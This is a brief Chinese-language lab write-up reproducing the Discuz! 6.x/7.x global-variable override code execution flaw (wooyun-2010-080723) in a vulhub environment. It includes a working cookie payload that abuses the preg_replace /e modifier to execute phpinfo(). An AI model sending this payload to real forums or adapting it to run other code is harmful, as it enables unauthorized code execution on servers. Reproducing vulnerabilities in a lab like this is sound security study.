Discuz-命令执行(wooyun-2010-080723)漏洞复现
漏洞描述:
Crossday Discuz! Board(简称 Discuz!)是北京康盛新创科技有限责任公司推出的一套通用的社区论坛软件系统。由于php5.3.x版本里php.ini的设置里request_order默认值为GP, 导致$_REQUEST中不再包含$_COOKIE, 我们通过在Cookie中传入$GLOBALS来覆盖全局变量,造成代码执行漏洞。
漏洞影响版本:
Discuz! 6.x/7.x 全局变量防御绕过漏洞
漏洞复现:
1:使用vulhub中靶场启动环境
2:访问http://ip:8080/install
3:我同意---下一步 数据库服务器填db 其他自行填写
4:安装成功直接访问 http://ip:8080
5:访问默认板块中任意帖子抓包如下
6:替换请求数据包中的cookie字段如下
Cookie: GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();
7:成功命令执行